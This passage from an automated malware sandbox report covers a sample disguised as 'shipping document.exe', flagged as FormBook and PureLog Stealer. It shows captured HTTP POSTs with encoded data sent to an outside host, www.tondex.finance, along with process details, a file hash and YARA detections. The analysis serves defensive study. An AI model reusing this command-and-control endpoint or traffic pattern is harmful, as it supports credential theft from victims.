                                                                                              Data Ascii: 12l42=nfFWPOMF+TnsTr0ve8OabwZKYnLHTOi2H7aLlDov4MSrMXtSM4V2/uQmcbV2dvTw/k2drL+yWBri4pDmK3abEFkuDHmI4o7bTIbvqFSVBw86RH23y3fYcXBxN2E4Gak/7WeK+UBLcLaGos8yqr+xZPv1uIMoRrp23qycdwRILqr2zRqWb8HbBMSLwoT7jex2uw==
                                                                                              Apr 24, 2024 07:29:18.696398020 CEST701INHTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:29:18 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              42192.168.2.44978391.195.240.19801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:29:21.231363058 CEST751OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.tondex.finance
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tondex.finance
                                                                                              Referer: http://www.tondex.finance/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 6e 66 46 57 50 4f 4d 46 2b 54 6e 73 63 71 45 76 4e 62 53 61 54 77 5a 4e 47 58 4c 48 61 75 69 79 48 37 47 4c 6c 42 45 2f 34 66 32 72 4a 44 70 53 4e 36 39 32 76 2b 51 6d 54 37 56 7a 44 66 54 33 2f 6b 71 6a 72 4a 36 79 57 46 37 69 34 73 6e 6d 4c 48 6d 59 45 56 6b 73 61 58 6d 4b 31 49 37 62 54 49 62 76 71 46 47 2f 42 30 51 36 52 58 47 33 7a 57 66 62 52 33 42 79 4b 32 45 34 51 71 6b 46 37 57 65 53 2b 56 63 57 63 4a 69 47 6f 74 73 79 72 36 2b 79 54 50 76 33 68 6f 4d 36 53 2b 4d 63 7a 6f 4c 30 55 7a 64 61 43 2b 66 41 37 33 37 4d 4b 4e 6d 4d 54 4d 32 34 74 76 61 50 75 64 4d 2f 31 79 67 78 44 6a 31 70 76 68 49 7a 2f 46 5a 38 74 59 70 70 2b 62 63 3d
                                                                                              Data Ascii: 12l42=nfFWPOMF+TnscqEvNbSaTwZNGXLHauiyH7GLlBE/4f2rJDpSN692v+QmT7VzDfT3/kqjrJ6yWF7i4snmLHmYEVksaXmK1I7bTIbvqFG/B0Q6RXG3zWfbR3ByK2E4QqkF7WeS+VcWcJiGotsyr6+yTPv3hoM6S+MczoL0UzdaC+fA737MKNmMTM24tvaPudM/1ygxDj1pvhIz/FZ8tYpp+bc=
                                                                                              Apr 24, 2024 07:29:21.588248968 CEST701INHTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:29:21 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              43192.168.2.44978491.195.240.1980
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:29:24.447482109 CEST10833OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.tondex.finance
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tondex.finance
                                                                                              Referer: http://www.tondex.finance/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 6e 66 46 57 50 4f 4d 46 2b 54 6e 73 63 71 45 76 4e 62 53 61 54 77 5a 4e 47 58 4c 48 61 75 69 79 48 37 47 4c 6c 42 45 2f 34 66 2b 72 4a 51 78 53 4d 63 31 32 39 75 51 6d 65 62 56 79 44 66 54 71 2f 6b 79 6e 72 4a 6d 69 57 44 6e 69 37 4f 76 6d 44 56 43 59 4c 56 6b 73 48 48 6d 4a 34 6f 37 43 54 4c 6a 7a 71 46 57 2f 42 30 51 36 52 56 65 33 30 48 66 62 54 33 42 78 4e 32 45 30 47 61 6c 4c 37 56 75 43 2b 56 49 47 63 34 43 47 6f 4e 63 79 70 49 6d 79 52 76 76 35 6d 6f 4e 70 53 2b 49 48 7a 6f 58 57 55 77 42 30 43 35 33 41 2b 53 2b 50 66 64 62 56 4d 76 4f 51 75 73 43 4e 76 39 6b 45 74 31 6f 2b 45 69 56 4c 34 51 51 67 31 57 34 70 6f 49 35 77 39 38 4e 30 4a 58 47 49 5a 4a 32 4c 4b 43 65 58 47 76 67 45 69 70 6c 31 4a 55 69 65 73 70 65 45 70 35 36 75 70 43 43 6c 70 2b 77 4f 58 49 31 61 65 73 36 46 37 59 35 52 2b 4b 4e 6c 6e 67 77 45 67 6d 57 33 4d 4f 5a 51 74 70 6f 51 2f 52 6f 54 34 30 76 50 67 50 50 36 33 2b 30 35 41 4d 64 35 53 72 78 5a 61 30 4a 2b 4a 58 56 39 65 79 4f 37 38 32 74 70 6f 77 6d 78 50 53 36 55 38 48 42 42 59 56 52 77 47 63 32 64 33 63 4a 6f 31 50 72 59 6d 6c 59 2b 6b 6f 34 78 6f 54 6b 76 74 78 75 56 53 65 55 63 69 33 69 6d 2f 35 46 76 43 36 74 6f 77 6c 36 62 38 6b 61 62 68 50 39 33 42 31 59 76 63 39 36 73 4a 2f 59 5a 4a 43 58 54 55 38 72 42 36 6e 30 4e 30 75 57 38 53 34 37 4e 50 4f 39 58 6f 6b 4f 55 33 69 45 78 54 71 6f 6f 37 4f 48 45 69 72 34 66 36 68 55 68 77 39 59 4a 74 61 41 34 69 35 2f 62 6b 33 49 73 42 6f 32 38 57 73 6b 2b 44 34 48 4c 42 4b 66 72 5a 4a 72 79 69 73 55 52 6e 54 4e 6b 76 39 4a 76 53 54 37 67 5a 67 78 58 36 50 4d 50 4e 69 4d 77 6e 4e 4d 30 58 47 54 7a 4f 4a 46 65 47 6e 72 36 47 64 4a 78 50 46 74 38 45 31 6e 41 34 4c 4c 73 35 42 4e 6b 2b 59 68 2f 61 4e 56 50 43 6a 61 62 63 48 53 36 65 64 4f 41 33 6c 54 56 6b 31 63 67 4a 75 32 55 30 55 69 38 2f 4f 7a 6a 50 42 74 74 4b 4a 62 6a 42 52 71 55 48 64 2f 6b 76 34 7a 69 58 46 2f 77 78 59 61 42 65 33 6b 66 6c 4d 33 68 53 6a 5a 76 43 6f 32 6a 36 52 34 4b 77 37 66 61 4a 4d 44 53 73 32 65 55 7a 51 69 56 68 72 62 71 57 30 59 68 33 6c 41 49 37 69 6f 4b 65 39 51 46 34 56 6b 33 62 6e 67 44 33 4b 44 52 4c 77 56 51 66 55 4d 56 53 7a 71 64 75 2b 70 43 73 4d 64 5a 4a 50 49 4b 66 4e 32 6f 5a 68 67 45 38 6a 62 6e 4c 61 65 32 76 6e 57 63 37 49 37 4e 48 6d 6d 6d 4d 64 38 54 6d 30 2f 4a 56 32 76 6a 33 43 6d 53 45 63 56 31 72 71 36 63 73 74 77 4a 47 6e 56 56 74 59 77 45 32 6c 79 43 73 74 41 4f 71 56 41 47 54 77 52 67 62 63 71 6f 5a 53 55 4e 7a 33 64 65 35 57 39 77 68 6b 48 61 6c 34 57 67 4d 6c 67 54 2b 72 6e 61 45 57 5a 4e 70 64 4c 4d 49 6a 54 6e 65 4d 2f 39 36 47 53 64 6b 6d 71 6d 78 63 75 41 30 71 6f 4f 59 49 54 6d 78 4e 6a 32 4b 74 38 52 64 72 57 35 57 7a 59 66 55 2b 6a 74 50 6b 79 59 2b 62 70 46 51 6e 4c 43 74 4d 7a 79 67 45 75 64 39 39 76 4c 33 42 63 43 5a 6c 43 31 64 2f 52 41 4a 61 30 66 36 35 76 43 62 4b 30 32 39 4b 5a 33 38 70 78 63 37 4a 4d 45 49 43 59 63 6d 6b 39 61 54 66 69 4a 67 2b 55 43 6c 45 78 46 30 48 70 30 46 36 39 52 6a 73 61 66 72 58 65 36 52 48 6d 76 55 64 50 62 4e 4c 56 6b 47 6f 74 34 39 49 4b 33 51 37 4c 76 44 45 66 68 6c 78 63 53 6d 5a 59 44 46 79 78 35 4b 35 72 38 34 35 42 41 78 78 50 43 68 47 39 4a 79 31 43 59 6c 4c 74 53 35 52 41 56 49 71 35 5a 4c 55 54 2f 6f 75 44 75 51 66 7a 4f 38 7a 41 63 65 4b 6c 30 34 39 7a 61 31 74 49 46 44 34 6e 4b 4f 6f 30 77 2b 59 76 64 47 4c 56 32 55 57 6e 57 43 42 4e 52 4e 70 57 57 45 79 4c 61 4f 67 68 35 51 79 54 2f 39 43 43 4b 4f 67 75 71 69 69 65 39 50 48 69 2b 37 58 30 53 57 49 2b 78 4d 6f 4d 30 58 38 6d 54 53 74 42 69 73 41 4d 75 34 30 71 78 37 75 51 42 46 72 69 64 4c 47 5a 68 4d 2f 64 49 2f 63 34 73 4f 4c 62 51 71 62 68 6a 53 66 63 56 6a 69 57 6a 47 39 72 35 75 2f 36 71 4d 4e 66 39 4c 30 32 5a 4d 37 6a 55 37 57 48 66 74 6a 67 6b 35 43 38 6b 31 6c 68 62 67 59 79 75 58 75 6e 76 57 4c 50 62 73 72 32 4d 39 62 55 2b 63 36 4e 51 4c 6b 71 63 52 6e 66 58 61 62 39 32 7a 61 74 48 75 58 77 48 63 30 4e 59 51 55 64 6a 72 62 67 52 47 4d 52 4e 79 54 62 6e 30 69 63 58 42 57 45 76 35 67 32 55 50 47 47 57 66 2b 6d 52 6e 68 36 44 56 63 61 5a 6f 33 6a 78 6c 62 6f 50 76 75 72 58 4e 5a 2f 59 77 48 64 65 33 68 7a 55 6a
                                                                                              Data Ascii: 12l42=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
                                                                                              Apr 24, 2024 07:29:24.763474941 CEST701INHTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:29:24 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:07:25:15
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Users\user\Desktop\shipping document.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\shipping document.exe"
                                                                                              Imagebase:0xf50000
                                                                                              File size:730'112 bytes
                                                                                              MD5 hash:180165361384E56DB00389733F0C54F5
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1680848791.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1677691413.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:07:25:17
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Users\user\Desktop\shipping document.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\shipping document.exe"
                                                                                              Imagebase:0xc80000
                                                                                              File size:730'112 bytes
                                                                                              MD5 hash:180165361384E56DB00389733F0C54F5
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
